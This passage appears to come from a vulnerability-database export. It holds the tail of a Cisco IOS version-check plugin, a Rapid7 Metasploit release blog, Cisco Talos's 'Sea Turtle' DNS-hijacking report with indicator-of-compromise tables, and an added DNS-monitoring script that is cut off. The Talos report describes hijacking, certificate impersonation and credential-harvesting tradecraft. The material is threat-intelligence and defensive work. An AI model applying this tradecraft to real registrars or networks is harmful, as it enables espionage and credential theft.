'15.2(4n)E2',\n '15.2(4o)E2',\n '15.2(5a)E1',\n '15.2(4p)E1',\n '15.2(4m)E2',\n '15.2(4o)E3',\n '15.2(4q)E1',\n '15.2(4s)E1',\n '15.2(4s)E2',\n '15.0(2)EZ',\n '15.2(2)SC3',\n '15.2(1)EY',\n 
'15.0(2)EJ',\n '15.0(2)EJ1',\n '15.2(2)EB',\n '15.2(2)EB1',\n '15.2(2)EB2',\n '15.2(2)EA',\n '15.2(2)EA1',\n '15.2(2)EA2',\n '15.2(3)EA',\n '15.2(4)EA',\n '15.2(4)EA1',\n '15.2(2)EA3',\n '15.2(4)EA3',\n '15.2(5)EA',\n '15.2(4)EA4',\n '15.2(4)EA2',\n '15.2(4)EA5',\n '15.0(2)SQD',\n '15.0(2)SQD1',\n '15.0(2)SQD2',\n '15.0(2)SQD3',\n '15.0(2)SQD4',\n '15.0(2)SQD5',\n '15.2(4)EC1',\n '15.2(4)EC2',\n '15.1(3)SVS',\n '15.1(3)SVT1'\n);\n\nvar workarounds = make_list(\n CISCO_WORKAROUNDS['ios_iosxe_telnet']\n);\n\nvar reporting = make_array(\n 'port' , product_info['port'],\n 'severity' , SECURITY_HOLE,\n 'bug_id' , 'CSCvd48893',\n 'cmds' , make_list('show running-config'),\n 'version' , product_info['version']\n);\n\ncisco::check_and_report(\n product_info:product_info,\n workarounds:workarounds,\n reporting:reporting,\n vuln_versions:version_list\n);\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "rapid7community": [{"lastseen": "2017-06-30T22:17:19", "description": "## Metasploit Hackathon\n\nWe were happy to host the very first Metasploit framework open source hackathon this past week in the Rapid7 Austin. 
Eight Metasploit hackers from outside of Rapid7 joined forces with the in-house team and worked on a lot of great projects, small and large.\n\n@bcook started the hackathon working with @sempervictus on his amazing backlog of framework features, including REX [library](<https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fgithub.com%2Frapid7%2Frex-socket%2Fpull%2F6>) [improvements](<https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fgithub.com%2Frapid7%2Frex-socket%2Fpull%2F5>), [UDP sessions](<https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fgithub.com%2Frapid7%2Fmetasploit-framework%2Fpull%2F7699>), TLS [encrypted sessions](<https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fgithub.com%2Frapid7%2Fmetasploit-payloads%2Fpull%2F208>), and [support for running framework in Rubinius](<https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fgithub.com%2Frapid7%2Fmetasploit-framework%2Fpull%2F8638>). We had a lot of good chats on how to move forward with bigger features, and our trees have begun to converge more.\n\n@zerosteiner worked on server support for the [Net-ssh library](<https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fgithub.com%2Fnet-ssh%2Fnet-ssh>), and right after that dropped Railgun support for [OSX Meterpreter](<https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fgithub.com%2Frapid7%2Fmetasploit-payloads%2Fpull%2F212>), and gave a [talk on it at BSides Cleveland.](<https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DkWd331CgxP0>) On the module side, we got the long-awaited DNS injection module from @kingsabri rewritten and enhanced. @bcook worked a lot with @mubix, whose intense testing and feedback made the module really great. Mubix served a unique role at the hackathon of testing everyone's ideas and providing a critical eye on usability and reliability in engagements. 
@bcook also worked with @sure-fire testing public PoC code for CVE-2017-3881 on a variety of Cisco gear, and we were able to convert @artkond's [great research](<https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fgithub.com%2Fartkond%2Fcisco-rce%2F>) into another [module PR](<https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fgithub.com%2Frapid7%2Fmetasploit-framework%2Fpull%2F8615>).\n\n@bperry stopped by with his guitar, and worked on [a plugin for the Arachni web scanner](<https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fgithub.com%2Frapid7%2Fmetasploit-framework%2Fpull%2F8618>). In his words, \"This complements the sqlmap plugin well, going from general web app scanning with arachni to full exploitation with sqlmap straight from Metasploit. It's something I've wanted in Metasploit for a while now.\". He also composed [a song for the occasion.](<https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DdtKF1FkdmSk>)\n\n@bcook worked on a long-awaited [search function for the Metasploit RPC interface](<https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fgithub.com%2Frapid7%2Fmetasploit-framework%2Fpull%2F8606>) while @mubix added [a nifty new plugin](<https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fgithub.com%2Frapid7%2Fmetasploit-framework%2Fpull%2F8612>) that publishes an RSS feed of shells as they come in. While testing various things, @mubix noticed that his database was taking a long time to delete a workspace. 
@darkbushido took a look and found that we could speed up deleting workspaces by several orders of magnitude by using [a different method](<https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fgithub.com%2Frapid7%2Fmetasploit_data_models%2Fpull%2F169>).\n\nJoining the hackathon virtually, @oj completed his [PR for an all-new crypto layer](<https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fgithub.com%2Frapid7%2Fmetasploit-framework%2Fpull%2F8625>) for Meterpreter transports, which provides application-layer encryption for sessions independent of the transport used. It also has the nice effect of reducing the size of Windows meterpreter 5-fold!\n\n@bwatters-r7, @hdm, @kernelsmith, @acammack-r7, and @izobashi also worked on a number of interesting projects, like a socks5 proxy, automated payload testing, selfhash support, and mimipenguins integration. We will be covering those as they make their way into the PR queue. In total, the hackathon was a great success and we look forward to having another one soon.\n\n## Passwords\n\nIn the continual game of cat and mouse with Windows password storage, [Rogdham](<https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fgithub.com%2FRogdham>) has brought the mice back on top this week. [SQUEEK!](<https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fi.chzbgr.com%2Ffull%2F7995955456%2Fh7B351141%2F>) Previously, Windows stored hashes using RC4 hashing, but Windows 10 uses AES128. With this update, the hashdump module will work with the AES128 hashes, too.\n\n## [catch yourself before you wrek yourself](<https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fgithub.com%2Frapid7%2Fmetasploit-framework%2Fpull%2F8543>)\n\nNo one likes seg faults while you're trying to be stealthy, so kudos to [tkmru](<https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fgithub.com%2Ftkmru>) who added some error handling to our armle reverse_tcp payload. 
Previously, the payload would segfault if it could not call back. Now, if it fails to call back, it fails silently, because the best kind of failure is the kind no one notices!\n\n## New Modules\n\n_Exploit modules_ _(4 new)_\n\n* [Netgear DGN2200 dnslookup.cgi Command Injection](<https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fexploit%2Flinux%2Fhttp%2Fnetgear_dnslookup_cmd_exec>) by SivertPL and thecarterb exploits CVE-2017-6334\n\n* [Symantec Messaging Gateway Remote Code Execution](<https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fexploit%2Flinux%2Fhttp%2Fsymantec_messaging_gateway_exec>) by Mehmet Ince exploits CVE-2017-6326\n\n* [Easy File Sharing HTTP Server 7.2 POST Buffer Overflow](<https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fexploit%2Fwindows%2Fhttp%2Feasyfilesharing_post>) by Marco Rivoli and bl4ck h4ck3r\n\n_Auxiliary and post modules_ _(1 new)_\n\n* [Riverbed SteelHead VCX File Read](<https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fauxiliary%2Fscanner%2Fhttp%2Friverbed_steelhead_vcx_file_read>) by Gregory DRAPERI and h00die\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` and you can get more details on the changes since the last blog post from GitHub:\n\n * [Pull Requests 4.14.26...4.14.28](<https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fgithub.com%2Frapid7%2Fmetasploit-framework%2Fpulls%3Fq%3Dis%3Apr%2Bmerged%3A%25222017-06-09T17%3A52%3A49-05%3A00%2B..%2B2017-06-22T19%3A00%3A32-05%3A00%2522>)\n * [Full diff 4.14.26...4.14.28](<https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fgithub.com%2Frapid7%2Fmetasploit-framework%2Fcompare%2F4.14.26...4.14.28>)\n\nTo install fresh, check out the open-source-only [Nightly 
Installers](<https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fgithub.com%2Frapid7%2Fmetasploit-framework%2Fwiki%2FNightly-Installers>), or the [binary installers](<https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Fmetasploit%2Fdownload.jsp>) which also include the commercial editions.\n", "cvss3": {}, "published": "2017-06-30T19:09:11", "type": "rapid7community", "title": "Metasploit Wrapup", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-6334", "CVE-2017-3881", "CVE-2017-6326"], "modified": "2017-06-30T19:09:11", "id": "RAPID7COMMUNITY:4CB1CCDD44A4FB09DC4B102A48D23618", "href": "https://community.rapid7.com/community/metasploit/blog/2017/06/30/metasploit-wrapup", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "talosblog": [{"lastseen": "2019-04-24T16:19:06", "description": "_Authors: [Danny Adamitis](<https://twitter.com/dadamitis>), [David Maynor](<https://twitter.com/Dave_Maynor>), [Warren Mercer](<https://twitter.com/SecurityBeard>), [Matthew Olney](<https://twitter.com/kpyke>) and [Paul Rascagneres](<https://twitter.com/r00tbsd>)._\n\n_Update 4/18: A correction has been made to our research based on feedback from Packet Clearing House; we thank them for their assistance._\n\n## Preface\n\nThis blog post discusses the technical details of a state-sponsored attack manipulating DNS systems. While this incident is limited to targeting primarily national security organizations in the Middle East and North Africa, and we do not want to overstate the consequences of this specific campaign, we are concerned that the success of this operation will lead to actors more broadly attacking the global DNS system. DNS is a foundational technology supporting the Internet. 
Manipulating that system has the potential to undermine the trust users have in the internet. That trust and the stability of the DNS system as a whole drives the global economy. Responsible nations should avoid targeting this system, work together to establish an accepted global norm that this system and the organizations that control it are off-limits, and cooperate in pursuing those actors who act irresponsibly by targeting this system. \n \n \n\n\n## Executive Summary\n\nCisco Talos has discovered a new cyber threat campaign that we are calling \"Sea Turtle,\" which is targeting public and private entities, including national security organizations, located primarily in the Middle East and North Africa. The ongoing operation likely began as early as January 2017 and has continued through the first quarter of 2019. Our investigation revealed that at least 40 different organizations across 13 different countries were compromised during this campaign. We assess with high confidence that this activity is being carried out by an advanced, state-sponsored actor that seeks to obtain persistent access to sensitive networks and systems. \n \nThe actors behind this campaign have focused on using DNS hijacking as a mechanism for achieving their ultimate objectives. DNS hijacking occurs when the actor can illicitly modify DNS name records to point users to actor-controlled servers. The Department of Homeland Security (DHS) issued an [alert](<https://www.us-cert.gov/ncas/alerts/AA19-024A>) about this activity on Jan. 24, 2019, warning that an attacker could redirect user traffic and obtain valid encryption certificates for an organization's domain names. \n \nIn the Sea Turtle campaign, Talos was able to identify two distinct groups of victims. The first group, which we identify as primary victims, includes national security organizations, ministries of foreign affairs, and prominent energy organizations. 
The threat actor targeted third-party entities that provide services to these primary entities to obtain access. Targets that fall into the secondary victim category include numerous DNS registrars, telecommunication companies, and internet service providers. One of the most notable aspects of this campaign was how the actors were able to perform DNS hijacking of their primary victims by first targeting these third-party entities. \n \nWe assess with high confidence that these operations are distinctly different and independent from the operations performed by DNSpionage, which we [reported](<https://blog.talosintelligence.com/2018/11/dnspionage-campaign-targets-middle-east.html>) on in November 2018. The Sea Turtle campaign almost certainly poses a more severe threat than DNSpionage given the actor's methodology in targeting various DNS registrars and registries. The level of access we presume necessary to engage in DNS hijacking successfully indicates an ongoing, high degree of threat to organizations in the targeted regions. Due to the effectiveness of this approach, we encourage all organizations, globally, to ensure they have taken steps to minimize the possibility of malicious actors duplicating this attack methodology. \n \nThe threat actors behind the Sea Turtle campaign show clear signs of being highly capable and brazen in their endeavors. The actors are responsible for the first [publicly confirmed](<https://www.netnod.se/news/statement-on-man-in-the-middle-attack-against-netnod>) case against an organization that manages a root server zone, highlighting the attacker's sophistication. Notably, the threat actors have continued their attacks despite public reports documenting various aspects of their activity, suggesting they are unusually brazen and may be difficult to deter going forward. In most cases, threat actors typically stop or slow down their activities once their campaigns are publicly revealed. 
\n \nThis post provides the technical findings you would typically see in a Talos blog. We will also offer some commentary on the threat actor's tradecraft, including possible explanations about the actor's attack methodology and thought process. Finally, we will share the IOCs that we have observed thus far, although we are confident there are more that we have not seen. \n \n\n\n### Background on Domain Name Services and records management\n\nThe threat actors behind the Sea Turtle campaign were successful in compromising entities by manipulating and falsifying DNS records at various levels in the domain name space. This section provides a brief overview of where DNS records are managed and how they are accessed to help readers better understand how these events unfolded. \n \nThe first and most direct way to access an organization's DNS records is through the registrar with the registrant's credentials. These credentials are used to log in to the DNS provider from the client side, which is a registrar. If an attacker was able to compromise an organization's network administrator credentials, the attacker would be able to change that particular organization's DNS records at will. \n \nThe second way to access DNS records is through a DNS registrar, sometimes called a registrar operator. A registrar sells domain names to the public and manages DNS records on behalf of the registrant through the domain registry. Records in the domain registry are accessed through the registry application using the Extensible Provisioning Protocol (EPP). EPP was detailed in the [request for comment (RFC) 5730](<https://tools.ietf.org/html/rfc5730>) as \"a means of interaction between a registrar's applications and registry applications.\" If the attackers were able to obtain one of these EPP keys, they would be able to modify any DNS records that were managed by that particular registrar. \n \nThe third approach to gain access to DNS records is through one of the registries. 
These registries manage any known TLD, such as entire country code top-level domains (ccTLDs) and generic top-level domains (gTLDs). For example, Verisign manages all entities associated with the top-level domain (TLD) \".com.\" All the different registry information then converges into one of [12 different](<https://www.iana.org/domains/root/servers>) organizations that manage different parts of the domain registry root. The domain registry root is stored on 13 \"named authorities in the delegation data for the root zone,\" according to [ICANN](<https://www.icann.org/news/blog/there-are-not-13-root-servers>). \n \nFinally, actors could target root zone servers to modify the records directly. It is important to note that there is no evidence during this campaign (or any other we are aware of) that the root zone servers were attacked or compromised. We highlight this as a potential avenue that attackers would consider. The root DNS servers issued a [joint statement](<https://root-servers.org/news/20190314-Rootops_statement_Integrity_of_root_server_system.pdf>) that stated, \"There are no signs of lost integrity or compromise of the content of the root [server] zone\u2026There are no signs of clients having received unexpected responses from root servers.\" \n\n\n### Assessed Sea Turtle DNS hijacking methodology\n\nIt is important to remember that the DNS hijacking is merely a means for the attackers to achieve their primary objective. Based on observed behaviors, we believe the actor ultimately intended to steal credentials to gain access to networks and systems of interest. To achieve their goals, the actors behind Sea Turtle: \n\n\n 1. Established a means to control the DNS records of the target.\n 2. Modified DNS records to point legitimate users of the target to actor-controlled servers.\n 3. 
Captured legitimate user credentials when users interacted with these actor-controlled servers.\n\nThe diagram below illustrates how we believe the actors behind the Sea Turtle campaign used DNS hijacking to achieve their end goals. \n \n\n\n### Redirection Attack Methodology Diagram\n\n \n\n\n### Operational tradecraft\n\n#### Initial access\n\nThe threat actors behind the Sea Turtle campaign gained initial access either by exploiting known vulnerabilities or by sending spear-phishing emails. Talos believes that the threat actors have exploited multiple known CVEs to either gain initial access or to move laterally within an affected organization. Based on our research, we know the actor utilizes the following known exploits: \n\n\n * [CVE-2009-1151](<https://nvd.nist.gov/vuln/detail/CVE-2009-1151>): PHP code injection vulnerability affecting phpMyAdmin\n * [CVE-2014-6271](<https://nvd.nist.gov/vuln/detail/CVE-2014-6271>): RCE affecting GNU bash system, specifically the SMTP (this was part of the [Shellshock](<https://www.us-cert.gov/ncas/alerts/TA14-268A>) CVEs)\n * [CVE-2017-3881](<https://nvd.nist.gov/vuln/detail/CVE-2017-3881>): RCE by unauthenticated user with elevated privileges on Cisco switches\n * [CVE-2017-6736](<https://nvd.nist.gov/vuln/detail/CVE-2017-6736>): Remote Code Exploit (RCE) for Cisco integrated Service Router 2811\n * [CVE-2017-12617](<https://nvd.nist.gov/vuln/detail/CVE-2017-12617>): RCE affecting Apache web servers running Tomcat\n * [CVE-2018-0296](<https://nvd.nist.gov/vuln/detail/CVE-2018-0296>): Directory traversal allowing unauthorized access to Cisco Adaptive Security Appliances (ASAs) and firewalls\n * [CVE-2018-7600](<https://nvd.nist.gov/vuln/detail/CVE-2018-7600>): RCE for Website built with Drupal, aka \"Drupalgeddon\"\n\nAs of early 2019, the only evidence of the spear-phishing threat 
vector came from a compromised organization's public disclosure. On January 4, Packet Clearing House, which is not an Internet exchange point but rather is an NGO which provides support to Internet exchange points and the core of the domain name system, provided confirmation of this aspect of the actors\u2019 tactics when it publicly revealed its internal DNS had been briefly hijacked as a consequence of the compromise at its domain registrar. \n \nAs with any initial access involving a sophisticated actor, we believe this list of CVEs to be incomplete. The actor in question can leverage known vulnerabilities as they encounter a new threat surface. This list only represents the observed behavior of the actor, not their complete capabilities. \n\n\n### Globalized DNS hijacking activity as an infection vector\n\nDuring a typical incident, the actor would modify the NS records for the targeted organization, pointing users to a malicious DNS server that provided actor-controlled responses to all DNS queries. The amount of time that the targeted DNS record was hijacked can range from a couple of minutes to a couple of days. This type of activity could give an attacker the ability to redirect any victim who queried for that particular domain around the world. [Other cybersecurity firms](<https://www.crowdstrike.com/blog/widespread-dns-hijacking-activity-targets-multiple-sectors/>) previously reported some aspects of this activity. Once the actor-controlled name server was queried for the targeted domain, it would respond with a falsified \"A\" record that would provide the IP address of the actor-controlled MitM node instead of the IP address of the legitimate service. In some instances, the threat actors modified the time-to-live (TTL) value to one second. This was likely done to minimize the risk of any records remaining in the DNS cache of the victim machine. 
\n \nDuring 2019, we observed the following name servers being used in support of the Sea Turtle campaign: \n \nDomain | Active Timeframe\n---|---\nns1[.]intersecdns[.]com | March - April 2019\nns2[.]intersecdns[.]com | March - April 2019\nns1[.]lcjcomputing[.]com | January 2019\nns2[.]lcjcomputing[.]com | January 2019\n\n### Credential harvesting: Man-in-the-middle servers\n\nOnce the threat actors accessed a domain's DNS records, the next step was to set up a man-in-the-middle (MitM) framework on an actor-controlled server. \n \nThe next step for the actor was to build MitM servers that impersonated legitimate services to capture user credentials. Once these credentials were captured, the user would then be passed to the legitimate service. To evade detection, the actors performed \"certificate impersonation,\" a technique in which the attacker obtained a certificate authority-signed X.509 certificate from another provider for the same domain, imitating the one already used by the targeted organization. For example, if a DigiCert certificate protected a website, the threat actors would obtain a certificate for the same domain but from another provider, such as Let's Encrypt or Comodo. This tactic would make detecting the MitM attack more difficult, as a user's web browser would still display the expected \"SSL padlock\" in the URL bar. \n \nWhen the victim entered their password into the attacker's spoofed webpage, the actor would capture these credentials for future use. The only indication a victim received was a brief lag between when the user entered their information and when they obtained access to the service. This would also leave almost no evidence for network defenders to discover, as legitimate network credentials were used to access the accounts. 
\n \nIn addition to the MitM server IP addresses published in previous reports, Talos identified 16 additional servers leveraged by the actor during the observed attacks. The complete list of known malicious IP addresses is in the Indicators of Compromise (IOC) section below. \n\n\n### Credential harvesting with compromised SSL certificates\n\nOnce the threat actors appeared to have access to the network, they stole the organization's SSL certificate. The attackers would then use the certificate on actor-controlled servers to perform additional MitM operations to harvest additional credentials. This allowed the actors to expand their access into the targeted organization's network. The stolen certificates were typically only used for less than one day, likely as an operational security measure. Using stolen certificates for an extended period would increase the likelihood of detection. In some cases, the victims were redirected to these actor-controlled servers displaying the stolen certificate. \n \nOne notable aspect of the campaign was the actors' ability to impersonate VPN applications, such as Cisco Adaptive Security Appliance (ASA) products, to perform MitM attacks. At this time, we do not believe that the attackers found a new ASA exploit. Rather, they likely abused the trust relationship associated with the ASA's SSL certificate to harvest VPN credentials to gain remote access to the victim's network. This MitM capability would allow the threat actors to harvest additional VPN credentials. \n \nAs an example, DNS records indicate that a targeted domain resolved to an actor-controlled MitM server. The following day, Talos identified an SSL certificate with the subject common name of \"ASA Temporary Self Signed Certificate\" associated with the aforementioned IP address. This certificate was observed on both the actor-controlled IP address and on an IP address correlated with the victim organization. 
\n \nIn another case, the attackers were able to compromise NetNod, a non-profit, independent internet infrastructure organization based in Sweden. NetNod acknowledged the compromise in a [public statement](<https://www.netnod.se/news/statement-on-man-in-the-middle-attack-against-netnod>) on February 5, 2019. Using this access, the threat actors were able to manipulate the DNS records for sa1[.]dnsnode[.]net. This redirection allowed the attackers to harvest credentials of administrators who manage domains with the TLD of Saudi Arabia (.sa). It is likely that there are additional Saudi Arabia-based victims from this attack. \n \nIn one of the more recent campaigns on March 27, 2019, the threat actors targeted the Sweden-based consulting firm Cafax. On Cafax's [public webpage](<http://www.cafax.se/Home.html>), the company states that one of their consultants actively manages the i[.]root-server[.]net zone. NetNod managed this particular DNS server zone. We assess with high confidence that this organization was targeted in an attempt to re-establish access to the NetNod network, which was previously compromised by this threat actor. \n\n\n### Primary and secondary victims\n\n[](<https://4.bp.blogspot.com/-NQC457__bD8/XLX7w7QGGOI/AAAAAAAAAgA/3nx4TTK6U1oHms5gRhGQRaw6TGmTo1H-ACEwYBhgL/s1600/image1.jpg>)\n\n \n \nWe identified 40 different organizations that have been targeted during this campaign. The victim organizations appear to be broadly grouped into two different categories. The first group of victims, which we refer to as primary victims, were almost entirely located in the Middle East and North Africa. Some examples of organizations that were compromised include: \n\n\n * Ministries of foreign affairs\n * Military organizations\n * Intelligence agencies\n * Prominent energy organizations\nThe second cluster of victim organizations were likely compromised to help enable access to these primary targets. 
These organizations were located around the world; however, they were mostly concentrated in the Middle East and North Africa. Some examples of organizations that were compromised include: \n\n\n * Telecommunications organizations\n * Internet service providers\n * Information technology firms\n * Registrars\n * One registry\n \nNotably, the threat actors were able to gain access to registrars that manage ccTLDs for Amnic, which is listed as the technical contact on [IANA](<https://www.iana.org/domains/root/db/am.html>) for the ccTLD .am. Obtaining access to these ccTLD registrars would have allowed attackers to hijack any domain that used those ccTLDs. \n\n\n### How is this tradecraft different?\n\nThe threat actors behind the Sea Turtle campaign have proven to be highly capable, as they have been able to perform operations for over two years and have been undeterred by public reports documenting various aspects of their activity. This cyber threat campaign represents the first known case of a domain name registry organization that was compromised for cyber espionage operations. \n \nIn order to distinguish this activity from the previous reporting on other attackers, such as those affiliated with DNSpionage, below is a list of traits that are unique to the threat actors behind the Sea Turtle campaign: \n\n\n * These actors perform DNS hijacking through the use of actor-controlled name servers.\n * These actors have been more aggressive in their pursuit, targeting DNS registries and a number of registrars, including those that manage ccTLDs.\n * These actors use Let's Encrypt, Comodo, Sectigo, and self-signed certificates in their MitM servers to gain the initial round of credentials.\n * Once they have access to the network, they steal the organization's legitimate SSL certificate and use it on actor-controlled servers.\n\n### Why was it so successful?\n\nWe believe that the Sea Turtle campaign continues to be highly successful for several reasons. 
First, the actors employ a unique approach to gain access to the targeted networks. Most traditional security products such as IDS and IPS systems are not designed to monitor and log DNS requests. The threat actors were able to achieve this level of success because the DNS domain space system added security into the equation as an afterthought. Had more ccTLDs implemented security features such as registrar locks, attackers would be unable to redirect the targeted domains. \n \nThe threat actors also used an interesting technique called certificate impersonation. This technique was successful in part because the SSL certificates were created to provide confidentiality, not integrity. The attackers stole organizations' SSL certificates associated with security appliances such as ASA to obtain VPN credentials, allowing the actors to gain access to the targeted network. \n \nThe threat actors were able to maintain long-term persistent access to many of these networks by utilizing compromised credentials. \n \nWe will continue to monitor Sea Turtle and work with our partners to understand the threat as it continues to evolve, to ensure that our customers remain protected and the public is informed. \n \n\n\n### Mitigation strategy\n\nIn order to best protect against this type of attack, we compiled a list of potential actions. Talos suggests using a registry lock service, which will require an out-of-band message before any changes can occur to an organization's DNS record. If your registrar does not offer a registry lock service, we recommend implementing multi-factor authentication, such as [DUO](<https://www.cisco.com/c/en/us/products/security/adaptive-multi-factor-authentication.html>), to access your organization's DNS records. If you suspect you were targeted by this type of intrusion, we recommend instituting a network-wide password reset, preferably from a computer on a trusted network. 
Lastly, we recommend applying patches, especially on internet-facing machines. Network administrators can monitor passive DNS records on their domains to check for abnormalities.

### Coverage

CVE-2009-1151: PHP code injection vulnerability affecting phpMyAdmin
SID: [2281](<https://snort.org/rule_docs/1-2281>)

CVE-2014-6271: RCE affecting GNU bash, specifically via SMTP (this was part of the Shellshock CVEs)
SID: [31975](<https://snort.org/rule_docs/1-31975>) - [31978](<https://snort.org/rule_docs/1-31978>), [31985](<https://snort.org/rule_docs/1-31985>), [32038](<https://snort.org/rule_docs/1-32038>), [32039](<https://snort.org/rule_docs/1-32039>), [32041](<https://snort.org/rule_docs/1-32041>) - [32043](<https://snort.org/rule_docs/1-32043>), [32069](<https://snort.org/rule_docs/1-32069>), [32335](<https://snort.org/rule_docs/1-32335>), [32336](<https://snort.org/rule_docs/1-32336>)

CVE-2017-3881: RCE for Cisco switches
SID: [41909](<https://snort.org/rule_docs/1-41909>) - [41910](<https://snort.org/rule_docs/1-41910>)

CVE-2017-6736: Remote Code Exploit (RCE) for Cisco Integrated Services Router 2811
SID: [43424](<https://snort.org/rule_docs/3-43424>) - [43432](<https://snort.org/rule_docs/3-43432>)

CVE-2017-12617: RCE affecting Apache web servers running Tomcat
SID: [44531](<https://snort.org/rule_docs/1-44531>)

CVE-2018-0296: Directory traversal to gain unauthorized access to Cisco Adaptive Security Appliances (ASAs) and Firewalls
SID: 46897

CVE-2018-7600: RCE for websites built with Drupal, aka "Drupalgeddon"
SID: [46316](<https://snort.org/rule_docs/1-46316>)

### Indicators of Compromise

The threat actors utilized leased IP addresses from organizations that offer virtual private server (VPS) services. These VPS providers have since resold many of these IP addresses to various benign customers.
To help network defenders, we have included the IP address, as well as the month(s) that the IP address was associated with the threat actor.

| IP address | Month | Year | Country of targets |
|---|---|---|---|
| 199.247.3.191 | November | 2018 | Albania, Iraq |
| 37.139.11.155 | November | 2018 | Albania, UAE |
| 185.15.247.140 | January | 2018 | Albania |
| 206.221.184.133 | November | 2018 | Egypt |
| 188.166.119.57 | November | 2018 | Egypt |
| 185.42.137.89 | November | 2018 | Albania |
| 82.196.8.43 | October | 2018 | Iraq |
| 159.89.101.204 | December - January | 2018-2019 | Turkey, Sweden, Syria, Armenia, US |
| 146.185.145.202 | March | 2018 | Armenia |
| 178.62.218.244 | December - January | 2018-2019 | UAE, Cyprus |
| 139.162.144.139 | December | 2018 | Jordan |
| 142.54.179.69 | January - February | 2017 | Jordan |
| 193.37.213.61 | December | 2018 | Cyprus |
| 108.61.123.149 | February | 2019 | Cyprus |
| 212.32.235.160 | September | 2018 | Iraq |
| 198.211.120.186 | September | 2018 | Iraq |
| 146.185.143.158 | September | 2018 | Iraq |
| 146.185.133.141 | October | 2018 | Libya |
| 185.203.116.116 | May | 2018 | UAE |
| 95.179.150.92 | November | 2018 | UAE |
| 174.138.0.113 | September | 2018 | UAE |
| 128.199.50.175 | September | 2018 | UAE |
| 139.59.134.216 | July - December | 2018 | United States, Lebanon |
| 45.77.137.65 | March - April | 2019 | Syria, Sweden |
| 142.54.164.189 | March - April | 2019 | Syria |
| 199.247.17.221 | March | 2019 | Sweden |

The following list contains the threat actor name server domains and their IP address.

| Domain | Active Timeframe | IP address |
|---|---|---|
| ns1[.]intersecdns[.]com | March - April 2019 | 95.179.150.101 |
| ns2[.]intersecdns[.]com | March - April 2019 | 95.179.150.101 |
| ns1[.]lcjcomputing[.]com | January 2019 | 95.179.150.101 |
| ns2[.]lcjcomputing[.]com | January 2019 | 95.179.150.101 |

Source: Cisco Talos blog, ["DNS Hijacking Abuses Trust In Core Internet Service"](<http://feedproxy.google.com/~r/feedburner/Talos/~3/GSxJP9GzlhI/seaturtle.html>), published 2019-04-18.
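The mitigation section recommends monitoring passive DNS records on your own domains for abnormalities. As an added example (not Talos code and not part of the original post), the Python below takes a list of observed NS and A records for a zone, compares the NS records against an expected allowlist, and flags any record that points at one of the name-server domains or IP addresses listed in the indicator tables above. The zone `example.com`, its expected name servers `ns1.example-dns.net`/`ns2.example-dns.net`, and the observation records are constructed sample data; the indicator values are copied from the post's tables.

```python
"""Added example: baseline check of a zone's NS and A records against an
expected allowlist and against the Sea Turtle indicators listed in the post.
Zone names, expected name servers and observations are constructed samples."""
from dataclasses import dataclass
from typing import Dict, Iterable, List, Set
import ipaddress

# Name-server domains (defanged) and IP addresses copied from the IoC tables
# in the post. 95.179.150.101 is the address the actor name servers resolved
# to; the remaining addresses are the leased VPS IPs from the first table.
SEA_TURTLE_NS_DOMAINS: Set[str] = {
    "ns1[.]intersecdns[.]com", "ns2[.]intersecdns[.]com",
    "ns1[.]lcjcomputing[.]com", "ns2[.]lcjcomputing[.]com",
}
SEA_TURTLE_IPS: Set[str] = {
    "95.179.150.101",
    "199.247.3.191", "37.139.11.155", "185.15.247.140", "206.221.184.133",
    "188.166.119.57", "185.42.137.89", "82.196.8.43", "159.89.101.204",
    "146.185.145.202", "178.62.218.244", "139.162.144.139", "142.54.179.69",
    "193.37.213.61", "108.61.123.149", "212.32.235.160", "198.211.120.186",
    "146.185.143.158", "146.185.133.141", "185.203.116.116", "95.179.150.92",
    "174.138.0.113", "128.199.50.175", "139.59.134.216", "45.77.137.65",
    "142.54.164.189", "199.247.17.221",
}


def normalize_name(name: str) -> str:
    """Refang '[.]', lower-case and drop the trailing dot so names compare equal."""
    return name.replace("[.]", ".").strip().lower().rstrip(".")


@dataclass(frozen=True)
class DnsObservation:
    owner: str    # record owner name, e.g. "example.com."
    rtype: str    # "NS" or "A"
    rdata: str    # name-server host or IP address
    source: str   # where the record was seen: "live" query or "pdns" feed


@dataclass(frozen=True)
class Finding:
    owner: str
    rtype: str
    rdata: str
    source: str
    reason: str   # "unexpected_ns", "ioc_ns_domain" or "ioc_ip"


def check_observations(observations: Iterable[DnsObservation],
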